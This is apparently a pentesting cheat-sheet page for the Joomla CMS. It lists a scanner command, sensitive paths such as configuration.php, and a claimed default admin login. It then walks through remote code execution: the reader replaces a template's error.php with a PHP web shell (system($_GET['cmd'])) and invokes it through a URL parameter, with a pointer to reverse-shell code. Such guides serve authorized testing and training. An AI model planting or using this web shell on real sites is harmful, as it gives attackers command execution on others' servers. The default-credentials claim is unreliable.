Joomla CMS Pentesting

Joomla is a content management system (CMS).

Scan

joomscan -u https://example.com

Common Directories

/administrator/
/administrator/manifests/files/joomla.xml
/cache/
/components/
/configuration.php
/htaccess.txt
/includes/
/index.php
/joomla.xml
/language/en-GB/en-GB.xml
/libraries/
/LICENSE.txt
/logs/
/media/
/modules/
/plugins/
/README.txt
/templates/
/tmp/
/web.config.txt

Default Credentials

The default username is "admin" and no password.

RCE

Reference: HackTricks

If we have admin credential, we may be able to execute arbitrary code by manipulating the site template.

At first, go to /administrator page and login with admin credential.

2. Select Template

In dashboard, go to template select menu, and click a template name. We can see the list of pages of the template on left menu. Here we edit the error.php so click it on the left menu.

3. Inject Arbitrary Code

In the editor for error.php, delete the original PHP code and insert arbitrary PHP code such as:

<?php system($_GET['cmd']); ?>

If we want to get the target shell, we can insert the code for reverse shell. Please see the Web Reverse Shell page for details. After that, click Save & Close .

4. Execute

Now access to the template’s error.php page as below:

https://example.com/templates/<template_name>/error.php
# or
https://example.com/templates/<template_name>/error.php?cmd=whoami

References

CMDJunkie

PreviousFUEL CMS Pentesting NextJoomla

Last updated 1 month ago

hashtagScan

hashtagCommon Directories

hashtagDefault Credentials

hashtagRCE

hashtag1. Login as Admin

hashtag2. Select Template

hashtag3. Inject Arbitrary Code

hashtag4. Execute

hashtagReferences